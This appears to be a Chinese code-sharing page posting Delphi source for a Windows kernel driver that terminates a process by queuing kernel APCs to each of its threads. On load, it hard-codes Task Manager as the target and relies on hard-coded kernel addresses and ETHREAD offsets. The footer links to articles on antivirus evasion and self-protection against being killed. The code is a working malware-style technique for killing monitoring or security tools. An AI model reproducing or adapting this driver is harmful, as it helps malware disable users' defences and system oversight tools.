delphi版插apc殺進程驅動源碼
從c代碼轉的,備份一下,裏面有硬編碼
unit MyDriver;
{$HINTS OFF}
{$WARNINGS OFF}
interface
uses
nt_status, ntoskrnl, native, winioctl, fcall, macros;
type
TKILL = record
PID: DWORD;
XP_PsGetNextProcessThread: dword;
end;
PKILL = ^TKILL;
const
DeviceName = '\Device\KPTest'; ///設備名
DosDeviceName = '\??\KPTest'; ///符號連接名
NtKernel = 'ntoskrnl.exe';
SystemProcessesAndThreadsInformation = 05;
PS_CROSS_THREAD_FLAGS_SYSTEM =$10;
type
KAPC_ENVIRONMENT = (OriginalApcEnvironment, AttachedApcEnvironment, CurrentApcEnvironment);
MODE = (KernelMode, UserMode, MaximumMode);
KPRIORITY = LONG;
PKAPC_STATE = ^KAPC_STATE;
KAPC_STATE = packed record
ApcListHead: array[0..1] of TListEntry;
Process: PVOID;
KernelApcInProgress: boolean;
KernelApcPending: boolean;
UserApcPending: boolean;
end;
PAnsiString = ^TAnsiString;
TAnsiString = packed record
Length: Word;
MaximumLength: Word;
Buffer: PChar;
end;
PKNORMAL_ROUTINE = procedure(NormalContext, SystemArgument1, SystemArgument2: PVOID); stdcall;
PKRUNDOWN_ROUTINE = procedure(Apc: PKAPC); stdcall;
PKKERNEL_ROUTINE = procedure(Apc: PKAPC; NormalRoutine: PKNORMAL_ROUTINE; NormalContext, SystemArgument1, SystemArgument2: PVOID); stdcall;
function _DriverEntry(pDriverObject: PDRIVER_OBJECT; pusRegistryPath: PUNICODE_STRING): NTSTATUS; stdcall;
function KeStackAttachProcess(Process: PVOID; ApcState: PKAPC_STATE): NTSTATUS; stdcall; external NtKernel name '_KeStackAttachProcess';
function KeUnstackDetachProcess(ApcState: PKAPC_STATE): NTSTATUS; stdcall; external NtKernel name '_KeUnstackDetachProcess';
function PsGetProcessImageFileName(Process: PVOID): PUCHAR; stdcall; external NtKernel name '_PsGetProcessImageFileName';
function KeGetCurrentThread(): PKThread; stdcall; external NtKernel name '_KeGetCurrentThread';
function PsGetCurrentThread(): PEThread; stdcall; external NtKernel name '_PsGetCurrentThread';
function PsGetCurrentProcessId(): HANDLE; stdcall; external NtKernel name '_PsGetCurrentProcessId';
procedure ObDereferenceObject(MyObject: PVOID); stdcall; external NtKernel name '_ObDereferenceObject';
function PsTerminateSystemThread(ExitStatus: NTSTATUS): NTSTATUS; external NtKernel name '_PsTerminateSystemThread';
type
TPSGETNEXTPROCESSTHREAD = function(Process: pvoid; Thread: PETHREAD): PETHREAD; stdcall;
function KeInitializeApc(
Apc: PKAPC;
Thread: PVOID;
Environment: KAPC_ENVIRONMENT;
KernelRoutine: PKKERNEL_ROUTINE;
RundownRoutine: PKRUNDOWN_ROUTINE;
NormalRoutine: PKNORMAL_ROUTINE;
ProcessorMode: KPROCESSOR_MODE;
NormalContext: PVOID
): NTSTATUS; stdcall; external NtKernel name '_KeInitializeApc';
function KeInsertQueueApc(
Apc: PKAPC;
SystemArgument1: PVOID;
SystemArgument2: PVOID;
Increment: KPRIORITY
): NTSTATUS; stdcall; external NtKernel name '_KeInsertQueueApc';
var
g_usDeviceName, g_usSymbolicLinkName: UNICODE_STRING;
implementation
function gettargetpid(procname: pchar): ULONG;
var
cb: DWORD;
p, pTemp: PVOID;
pnProcessName: TAnsiString;
aa: Tansistring;
iCnt: integer;
pThreadAddr: Pointer;
uModule: ULONG;
process: PVOID;
begin
cb := 0;
result := 0;
ZwQuerySystemInformation(SystemProcessesAndThreadsInformation, @p, 0, @cb);
if cb <> 0 then
begin
p := ExAllocatePool(PagedPool, cb);
if p <> nil then
begin
if ZwQuerySystemInformation(SystemProcessesAndThreadsInformation,
p, cb, @cb) = STATUS_SUCCESS then
begin
pTemp := p;
repeat
with (PSYSTEM_PROCESS_INFORMATION(pTemp))^.Process_NT5.Process do
begin
RtlUnicodeStringToAnsiString(@pnProcessName, @ProcessName, True);
//DbgPrint(pnProcessName.Buffer);
if (_stricmp(pnProcessName.Buffer, 'taskmgr.exe') = 0) then
begin
PsLookupProcessByProcessId(ProcessId, process);
result := ProcessId;
exit;
end;
inc(PCHAR(pTemp), NextEntryDelta);
end;
until (PSYSTEM_PROCESS_INFORMATION(pTemp))^.Process_NT5.Process.NextEntryDelta = 0;
end;
ExFreePool(p);
end;
end;
end;
function DispatchCreateClose(p_DeviceObject: PDEVICE_OBJECT; p_Irp: PIRP): NTSTATUS; stdcall; ///對打開或關閉請求的響應 ,這裏就是簡單的返回一個成功
begin
p_Irp^.IoStatus.Status := STATUS_SUCCESS; ///設置狀態爲STATUS_SUCCESS 即成功
p_Irp^.IoStatus.Information := 0;
IofCompleteRequest(p_Irp, IO_NO_INCREMENT); ///調用IoCompleteRequest完成IRP
Result := STATUS_SUCCESS;
end;
function KernelTerminateThreadRoutine(
Apc: PKAPC;
NormalRoutine: PKNORMAL_ROUTINE;
NormalContext: PVOID;
SystemArgument1: PVOID;
SystemArgument2: PVOID
):Ulong;stdcall;
begin
ExFreePool(Apc);
PsTerminateSystemThread(0);
//DbgPrint('oh yeah!');
result:=DbgPrint('oh yeah!');
end;
function MyTerminateThread(Thread: PETHREAD): BOOLEAN;
var
bSucceed: BOOLEAN;
Apc :PKAPC;
begin
Apc := nil;
bSucceed := FALSE;
if not (MmIsAddressValid(Thread)) then
begin
result := false;
exit;
end;
Apc := ExAllocatePool(NonPagedPool, sizeof(KAPC));
DbgPrint('ethread is:%x', ulong(Thread));
PULONG(ulong(Thread)+ $248 )^:=$00000010;
DbgPrint('Apc^ is:%x', Apc^);
DbgPrint('Apc is:%x', Apc);
DbgPrint('sizeof(Apc) is:%x', sizeof(KAPC));
DbgPrint('Thread is:%x', Thread);
DbgPrint('OriginalApcEnvironment is:%x', OriginalApcEnvironment);
DbgPrint('@KernelTerminateThreadRoutine is:%x', @KernelTerminateThreadRoutine);
DbgPrint('KernelMode is:%x', KernelMode);
if Apc=nil then DbgPrint('失敗');
KeInitializeApc(Apc,
Thread,
OriginalApcEnvironment,
@KernelTerminateThreadRoutine,
nil,
nil,
KPROCESSOR_MODE(KernelMode),
nil);
bSucceed := BOOLEAN(KeInsertQueueApc(Apc, PVOID(0), PVOID(0), 0));
result := bSucceed;
end;
function Kill(eprocess: pvoid): NTSTATUS;
var
st: NTSTATUS;
ethread: PETHREAD;
MyPspGetNetxtThread: TPSGETNEXTPROCESSTHREAD;
begin
st := STATUS_SUCCESS;
ethread := nil;
MyPspGetNetxtThread := TPSGETNEXTPROCESSTHREAD($8057EAEC);
ethread := MyPspGetNetxtThread(eprocess, nil);
while ethread <> nil do
begin
MyTerminateThread(ethread);
ethread := MyPspGetNetxtThread(eprocess, ethread);
end;
result := st;
end;
procedure KillByPid(pid: ulong);
var
st: NTSTATUS;
eprocess: pvoid;
begin
st := STATUS_SUCCESS;
eprocess := nil;
DbgPrint('PID is:%d', pid);
if pid=0 then exit;
st := PsLookupProcessByProcessId(pid, eprocess);
if (NT_SUCCESS(st)) then
begin
ObDereferenceObject(eprocess);
st := Kill(eprocess);
end;
end;
function DispatchControl(p_DeviceObject: PDEVICE_OBJECT; p_Irp: PIRP): NTSTATUS; stdcall;
var
dwIoControlCode: DWORD;
dwInputBufferLength, dwOutBufferLength: DWORD;
status: NTSTATUS;
dwBytesReturned: DWORD;
psl: PIO_STACK_LOCATION;
IOCTL_KILL_PROCESS: DWORD;
pSystemBuffer: Pointer;
//InBuffer: PKILL;
begin
dwBytesReturned := 0;
psl := IoGetCurrentIrpStackLocation(p_Irp); {取IRP的stack location的指針}
dwIoControlCode := psl^.Parameters.DeviceIoControl.IoControlCode; ///取控制碼
dwInputBufferLength := psl^.Parameters.DeviceIoControl.InputBufferLength; ///傳入Buffer的大小
dwOutBufferLength := psl^.Parameters.DeviceIoControl.OutputBufferLength; ///傳出Buffer的大小
pSystemBuffer := p_Irp^.AssociatedIrp.SystemBuffer; ///傳入Buffer的指針
IOCTL_KILL_PROCESS := CTL_CODE(FILE_DEVICE_UNKNOWN, $805, METHOD_BUFFERED, FILE_READ_ACCESS + FILE_WRITE_ACCESS); ///生成咱們的控制碼
if dwIoControlCode = IOCTL_KILL_PROCESS then ///若是是咱們的控制碼
begin
DbgPrint('Control Code is:0x%X', dwIoControlCode); ///輸出咱們的控制碼
dwBytesReturned := 0; ///這裏設置返回數據的大小
status := STATUS_SUCCESS;
end else
begin
status := STATUS_INVALID_DEVICE_REQUEST;
end;
p_Irp^.IoStatus.Status := status;
p_Irp^.IoStatus.Information := dwBytesReturned;
IofCompleteRequest(p_Irp, IO_NO_INCREMENT); ///完成IRP
Result := status;
end;
procedure DriverUnload(p_DriverObject: PDRIVER_OBJECT); stdcall;
begin
DbgPrint('Driver Unload!'); ///輸出調試字符串
IoDeleteSymbolicLink(@g_usSymbolicLinkName); ///刪除咱們建立的符號連接
IoDeleteDevice(p_DriverObject^.DeviceObject); ///刪除咱們建立的設備
end;
///驅動入口點
function _DriverEntry(pDriverObject: PDRIVER_OBJECT; pusRegistryPath: PUNICODE_STRING): NTSTATUS;
var
status: NTSTATUS;
mypid:ulong;
DeviceObject: TDeviceObject;
begin
status := STATUS_DEVICE_CONFIGURATION_ERROR;
///初始化UNICODE_STRING結構
RtlInitUnicodeString(g_usDeviceName, DeviceName);
RtlInitUnicodeString(g_usSymbolicLinkName, DosDeviceName);
mypid:= gettargetpid('taskmgr.exe');
DbgPrint('mypid is:%d', mypid);
KillByPid(mypid);
///建立設備
if (IoCreateDevice(pDriverObject, 0, @g_usDeviceName,
FILE_DEVICE_UNKNOWN, 0, FALSE,
DeviceObject) = STATUS_SUCCESS) then
begin
///若是建立成功
DbgPrint('Create Device Success'); ///輸出調試字符串
///建立符號連接
if (IoCreateSymbolicLink(@g_usSymbolicLinkName,
@g_usDeviceName) = STATUS_SUCCESS) then
begin
///若是建立符號連接成功執行下面的代碼
DbgPrint('Create SymbolicLink Success'); ///輸出調試字符串
///開始設置咱們本身的分發函數
pDriverObject^.MajorFunction[IRP_MJ_CREATE] := @DispatchCreateClose; ///這裏把IRP_MJ_CREATE IRP_MJ_CLOSE設置到一個函數上
pDriverObject^.MajorFunction[IRP_MJ_CLOSE] := @DispatchCreateClose;
pDriverObject^.MajorFunction[IRP_MJ_DEVICE_CONTROL] := @DispatchControl; ///對DeviceIoControl的響應,很是重要
pDriverObject^.DriverUnload := @DriverUnload; ///當驅動動態卸載時執行DriverUnload
status := STATUS_SUCCESS; ///返回STATUS_SUCCESS;
end else ///若是建立符號連接不成功
begin
DbgPrint('Create SymbolicLink Failed'); ///輸出調試字符串
IoDeleteDevice(@DeviceObject); ///刪除設備
end;
end;
Result := status;
end;
end.
相關文章
- 1. apc啓動新進程
- 2. Windows驅動學習(三)-- 殺死進程
- 3. 一個Delphi的源碼加密插件
- 4. STM32開源代碼——28BYJ-48步進電機+ULN2003驅動程序
- 5. 查、殺、啓動進程
- 6. 源碼免殺教程 源碼免殺思路詳解
- 7. DELPHI實現關閉指定進程,自身防殺
- 8. 【源碼】APC螺旋槳的動態推力計算器
- 9. 基於STM32的USB驅動程序設計,PC驅動程序,Android驅動程序源碼一鍋端
- 10. mysql 殺進程
- 更多相關文章...
- • Maven 插件 - Maven教程
- • Docker 資源彙總 - Docker教程
- • IntelliJ IDEA安裝代碼格式化插件
- • Java Agent入門實戰(二)-Instrumentation源碼概述
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. python的安裝和Hello,World編寫
- 2. 重磅解讀:K8s Cluster Autoscaler模塊及對應華爲雲插件Deep Dive
- 3. 鴻蒙學習筆記2(永不斷更)
- 4. static關鍵字 和構造代碼塊
- 5. JVM筆記
- 6. 無法啓動 C/C++ 語言服務器。IntelliSense 功能將被禁用。錯誤: Missing binary at c:\Users\MSI-NB\.vscode\extensions\ms-vsc
- 7. 【Hive】Hive返回碼狀態含義
- 8. Java樹形結構遞歸(以時間換空間)和非遞歸(以空間換時間)
- 9. 數據預處理---缺失值
- 10. 都要2021年了,現代C++有什麼值得我們學習的?
歡迎關注本站公眾號,獲取更多信息
